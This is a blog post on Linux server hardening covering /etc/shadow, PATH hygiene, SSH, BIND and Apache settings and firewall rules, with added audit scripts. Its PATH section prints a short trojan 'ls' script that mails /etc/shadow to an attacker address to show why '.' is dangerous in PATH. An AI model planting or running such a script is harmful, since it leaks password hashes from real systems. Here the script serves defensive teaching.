Security Tips for Your Linux (Server) (Part 1)

I haven't published anything on the blog for a long time and I would like to share with you some tips taken from a book, (among others). I found it at the University and have just read it, and although it is honestly outdated and the techniques shown are unlikely to work given how systems have evolved, they are still interesting points worth showing. 9788448140502

I want to clarify that these tips are aimed at a Linux system used as a server, at medium or perhaps large scale, since at the desktop-user level, although they can be applied, they will not be very useful.

I also warn you that these are quick tips and I will not go into much detail, although I plan to write another, more specific and extensive post on a particular topic. But I'll see about that later. Let's begin.

Password policies.

Although it may sound like a cliché, having a good password policy makes the difference between a vulnerable system and one that is not. Attacks such as "brute force" take advantage of a weak password to gain access to a system. The most common tips are:

  • Combine upper and lower case.
  • Use special characters.
  • Numbers.
  • More than 6 characters (hopefully more than 8).

In addition to this, let's consider two important files: /etc/passwd and /etc/shadow.

The most important point concerns the /etc/passwd file. Besides giving us the user name, uid, home directory, shell, etc., in some cases it also shows the user's encrypted password.

Let's look at its typical structure.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user:cryptkey:uid:gid:comment:home:shell

The real problem here is that this file has permissions -rw-r--r--, which means it is readable by any user on the system, and once someone has the encrypted password it is not very hard to work out the real one.

That is why the /etc/shadow file exists. This is the file where all user passwords are stored, among other things. This file has the necessary permissions so that no ordinary user can read it.

To fix this, then, we must go to the /etc/passwd file and change the encrypted password to an "x"; this causes the password to be stored only in our /etc/shadow file.

desdelinux:x:500:501::/home/usuario1:/bin/bash
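
The check described above, as an added example (not from the original post): a small audit that flags passwd-format entries whose second field still carries a hash or is empty, plus a permission check for the two files. The desdelinux line in the sample is the one shown above; the root, guest and daemon lines are constructed.

```shell
#!/bin/sh
# Added example, not from the original post.
# Sample input: the first line is the article's example; the others are constructed.
sample_passwd() {
cat <<'EOF'
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
root:x:0:0:root:/root:/bin/bash
guest::502:502::/home/guest:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
EOF
}

# Read passwd-format lines on stdin and report risky password fields.
#   "x"            -> hash lives in /etc/shadow (fine)
#   "*" or "!..."  -> account cannot log in with a password (fine)
#   empty          -> no password required
#   anything else  -> a hash that every local user can read
passwd_findings() {
    awk -F: '
        $2 == ""                   { print $1 ": empty password field"; next }
        $2 != "x" && $2 !~ /^[*!]/ { print $1 ": hash stored in passwd" }
    '
}

# Print the file name if "other" has read permission on it.
# /etc/passwd is expected to match; /etc/shadow must not.
world_readable() {
    find "$1" -prune -perm -004 -print
}

sample_passwd | passwd_findings
```

On a real host, run `passwd_findings < /etc/passwd`; where the shadow suite is installed, `pwconv` performs the move to /etc/shadow that the text describes.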

Problems with PATH, .bashrc and others.

When a user runs a command in their console, the shell looks for that command in the list of directories contained in the PATH environment variable.

If you type "echo $PATH" in the console, something like this will appear.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Each of these directories is a place where the shell will look for the typed command in order to run it. The "." means that the first directory searched is the very directory from which the command is run.

Suppose there is a user "carlos" and this user wants to "do bad things." This user could leave a file called "ls" in their home directory, and in this file run a command like:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

And if the root user, for whatever reason, tries to list the files inside Carlos's directory (since the shell starts looking for the command in that same folder), then without realizing it he will send the file with the passwords to this email address, after which the folders will be listed, and he will not notice until it is too late.

To avoid that, we must remove the "." from the PATH variable.

In the same way, files such as .bashrc, .bash_profile and .login should be audited to check that "." is not present in the PATH variable; indeed, in files like these one can also change the destination of a particular command.
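
An added example (not from the original post) of the PATH check and the fix described above. It goes slightly beyond the text: besides ".", it also reports empty entries and other relative paths, which the shell likewise resolves against the current directory.

```shell
#!/bin/sh
# Added example, not from the original post.
# List PATH entries that are searched relative to the current directory:
# ".", any other relative path, and empty entries (a leading, trailing or
# doubled ":" is treated by the shell as the current directory too).
risky_path_entries() {
    rest="$1:"                      # sentinel ":" keeps a trailing empty entry
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            '') echo '(empty)' ;;
            /*) ;;                  # absolute path: fine
            *)  echo "$entry" ;;
        esac
    done
}

# Rebuild a PATH value keeping only absolute directories, in order.
clean_path() {
    rest="$1:"
    out=
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            /*) out=${out:+$out:}$entry ;;
        esac
    done
    printf '%s\n' "$out"
}

# The PATH value shown in the article.
article_path='.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin'
risky_path_entries "$article_path"
clean_path "$article_path"
```

Run `risky_path_entries "$PATH"` as root and for every account whose startup files set PATH.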

Tips for services:

SSH

  • Disable version 1 of the ssh protocol in the sshd_config file.
  • Do not allow the root user to log in via ssh.
  • The files and folders ssh_host_key, ssh_host_dsa_key and ssh_host_rsa_key should be readable only by the root user.

BIND

  • Change the welcome banner in the named.conf file so that it does not show the version number.
  • Limit zone transfers, and allow them only for the machines that need them.

Apache

  • Prevent the service from showing its version in the welcome banner. Edit the httpd.conf file and add or modify the lines:

ServerSignature Off
ServerTokens Prod

  • Disable automatic indexing.
  • Configure Apache not to serve sensitive files such as .htaccess, *.inc, *.jsp, etc.
  • Remove the manual or sample pages from the service.
  • Run Apache in a chroot environment.

Network security.

It is essential to cover every possible entry point into your system from the external network; below are some essential tips to prevent intruders from scanning and obtaining information about your network.

Block ICMP traffic

The firewall should be configured to block all types of incoming and outgoing ICMP traffic and echo responses. With this you prevent, for example, a scanner looking for live hosts in an IP range from finding you.

Avoid TCP ping scans.

Another way to scan your system is the TCP ping scan. Suppose there is an Apache server on port 80 of your server. An intruder could send an ACK request to that port; if the system responds, this confirms that the machine is alive, and the intruder will go on to scan the other ports.

For this, your firewall should always have the "state awareness" option enabled and should drop all ACK packets that do not correspond to an already established TCP connection or session.

Some additional tips:

  • Use IDS systems to detect port scans on your network.
  • Configure the firewall not to trust connections based on their source port values.

This is because some scanners use a "fake" source port such as 20 or 53, since many systems trust these ports because they are the usual ones for FTP or DNS.
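
One way to express the rules from this section with iptables, as an added example (not from the original post): a ruleset in iptables-restore format, plus a check that finds rules trusting a source port. Port 80 is the Apache example from the text; the DROP policies, the loopback rule and the weak rule at the end are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# Ruleset in iptables-restore format. Port 80 is the article's Apache
# example; the DROP policies and the loopback rule are assumptions.
firewall_rules() {
cat <<'EOF'
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
# TCP ping scan: a bare ACK (or any non-SYN segment) that opens no tracked
# connection is NEW or INVALID to conntrack, so it is dropped silently.
-A INPUT -m conntrack --ctstate INVALID -j DROP
-A INPUT -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
# Replies are accepted by connection state, never by source port.
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# ICMP in both directions; errors RELATED to a tracked connection were
# already accepted by the rule above.
-A INPUT -p icmp -j DROP
-A OUTPUT -p icmp -j DROP
-A INPUT -p tcp --dport 80 --syn -m conntrack --ctstate NEW -j ACCEPT
COMMIT
EOF
}

# Read a ruleset on stdin and print ACCEPT rules that match on a source
# port without any connection-state match (the pattern the text warns about).
stateless_sport_accepts() {
    grep -E -- '-j ACCEPT' | grep -E -- '--(sport|source-port)' \
        | grep -v -- '--ctstate' || true
}

# Constructed example of the weak pattern: trusts anything "from port 53".
weak_rule='-A INPUT -p udp --sport 53 -j ACCEPT'

firewall_rules | stateless_sport_accepts            # prints nothing
printf '%s\n' "$weak_rule" | stateless_sport_accepts # prints the weak rule
```

Load the ruleset as root with `firewall_rules | iptables-restore`; `iptables-restore --test` parses it without committing anything.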

NOTE: Remember that most of the problems shown in this post have already been solved in almost all current distributions. But it never hurts to have background knowledge about these issues so that they don't happen to you.

NOTE: Later I will look at a specific topic and write a post with much more detail and up-to-date information.

Thank you all for reading.

Regards



  1.   ngokufundisayo said

    I liked the article a lot and I am interested in the topic; I encourage you to keep uploading content.